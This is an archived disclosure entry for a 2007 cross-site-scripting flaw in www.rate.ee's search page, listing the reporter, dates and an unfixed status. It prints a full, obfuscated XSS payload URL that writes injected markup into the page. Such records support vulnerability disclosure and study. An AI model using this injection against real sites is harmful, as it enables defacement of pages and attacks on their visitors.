Security researcher Babaconda, has submitted on 24/06/2007 a cross-site-scripting (XSS) vulnerability affecting www.rate.ee, which at the time of submission ranked 663 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 24/06/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 24/06/2007 |
Date published: 24/06/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Babaconda |
Domain: www.rate.ee |
Category: XSS |
Pagerank: 663 |
URL: http://www.rate.ee/search.php?height1="><SCRIPT>document.write(String.fromCharCode(60,83,67,82,73)); </SCRIPT>PT>%20document.write(String.fromCharCode(60,98,111,100,121,32,111,110,108,111,97,100,61,34, 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,99,101,110,116,101,114,62,60,104,50,6 2,84,104,101,32,103,105,114,108,32,105,115,32,101,108,105,116,101,58,68,60,47,104,50,62,60,47,99,101 ,110,116,101,114,62,39,41,34,62))</SCRIPT> |
Click here to view the mirror
|
|